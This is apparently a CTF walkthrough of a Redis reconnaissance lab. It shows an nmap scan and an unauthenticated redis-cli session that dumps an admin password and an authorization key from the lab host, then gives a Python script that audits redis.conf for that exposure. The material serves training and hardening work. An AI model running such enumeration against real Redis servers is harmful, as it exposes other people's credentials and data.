SINCON Wonderland CTF — Network Recon (Points: 100)

happybear
Jan 5, 2021

A web application uses a Redis server as the database server. The attacker has sneaked into the network on which the Redis server is present.

Please answer the following questions:

1. What message is being published on the active channel of the Redis server?

2. Find the key which contains the hash field ‘authorization_key’.

3. Find the value of hash field ‘admin_password’ stored at the ‘settings’ key.

root@attackdefense:~# nmap 192.177.193.3 -p 6379
Starting Nmap 7.70 ( https://nmap.org ) at 2021-01-02 03:13 UTC
Nmap scan report for target-1 (192.177.193.3)
Host is up (0.000036s latency).
PORT STATE SERVICE
6379/tcp open redis
MAC Address: 02:42:C0:B1:C1:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds

Verified that the Redis port is open; will now try to connect and look around.

root@attackdefense:~# redis-cli  -h 192.177.193.3
192.177.193.3:6379> info
# Server
redis_version:5.0.4
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:21338beea4f0313b
redis_mode:standalone
os:Linux 5.4.0-1030-aws x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:5.4.0
...
# Keyspace
db0:keys=10,expires=0,avg_ttl=0
192.177.193.3:6379> pubsub channels *
1) "notifications"

There is 1 db and a notifications channel.

To solve the first flag, subscribe to the channel to get the answer.

192.177.193.3:6379> subscribe notifications
Reading messages... (press Ctrl-C to quit)
1) "subscribe"
2) "notifications"
3) (integer) 1
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
1) "message"
2) "notifications"
3) "Password for user 'admin' was updated."
^C

Now to find out what keys are available to solve the second flag. I guessed that the authorization key is probably stored in the config key (spoiler: I am right). Questions 2 & 3 solved.

192.177.193.3:6379> keys *
1) "active_api_keys"
2) "data"
3) "blacklisted-ip"
4) "is-offline"
5) "statistics"
6) "home_page"
7) "greetings"
8) "config"
9) "users"
10) "settings"
192.177.193.3:6379> get greetings
"Welcome to Attack Defense Recon Basic Badge Challenge."
192.177.193.3:6379> get config
(error) WRONGTYPE Operation against a key holding the wrong kind of value
192.177.193.3:6379> hgetall config
1) "authorization_key"
2) "d9bd6d9150d3f7004830819da569aa9a"
3) "endpoint"
4) "api.recon-badge.local/private"
5) "parameter"
6) "data"
7) "method"
8) "POST"
9) "parameter_type"
10) "json"
192.177.193.3:6379> hgetall settings
1) "username"
2) "admin"
3) "contact-no"
4) "4123454165"
5) "role"
6) "sys_admin"
7) "admin_password"
8) "superSecretPass@123"
9) "last_login"
10) "12/06/2019"
11) "email"
12) "admin@recon-badge.local"
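
The session above worked because the server answered INFO, PUBSUB, SUBSCRIBE, KEYS and HGETALL without any AUTH. As an added example (not part of the original write-up), this Python script audits a redis.conf for the settings that permit that on a Redis 5.x server like the one shown; both sample configs are constructed, and the function names are hypothetical.

```python
import shlex

# Commands the walkthrough ran without authenticating.
WALKTHROUGH_COMMANDS = ("INFO", "PUBSUB", "SUBSCRIBE", "KEYS", "HGETALL")
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed sample configs (not taken from the CTF host).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass "constructed-long-random-secret"
rename-command KEYS ""
rename-command PUBSUB ""
"""

def parse_conf(text):
    """Return (directives, renamed); renamed maps COMMAND -> new name ('' disables it)."""
    directives, renamed = {}, {}
    for raw in text.splitlines():
        parts = shlex.split(raw, comments=True)  # drops '#' comments, strips quotes
        if not parts:
            continue
        name, args = parts[0].lower(), parts[1:]
        if name == "rename-command" and len(args) == 2:
            renamed[args[0].upper()] = args[1]
        else:
            directives[name] = args
    return directives, renamed

def audit(text):
    """Report whether the session above would still work against this config."""
    d, renamed = parse_conf(text)
    has_password = bool((d.get("requirepass") or [""])[0])
    binds = d.get("bind", [])
    protected = (d.get("protected-mode") or ["yes"])[0].lower() == "yes"
    # Redis 5.x: protected mode limits clients to loopback only when there is
    # no explicit bind and no password; an explicit bind is used as written.
    remote = any(b not in LOOPBACK for b in binds) if binds else (has_password or not protected)
    return {
        "unauthenticated_remote_access": remote and not has_password,
        # Redis 5 has no ACLs (added in 6.0); rename-command is the per-command control.
        "commands_under_default_name": [c for c in WALKTHROUGH_COMMANDS if c not in renamed],
    }
```

Renaming INFO, SUBSCRIBE or HGETALL would usually break the application itself, so on 5.x the password and the bind address are the controls that matter for those three.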
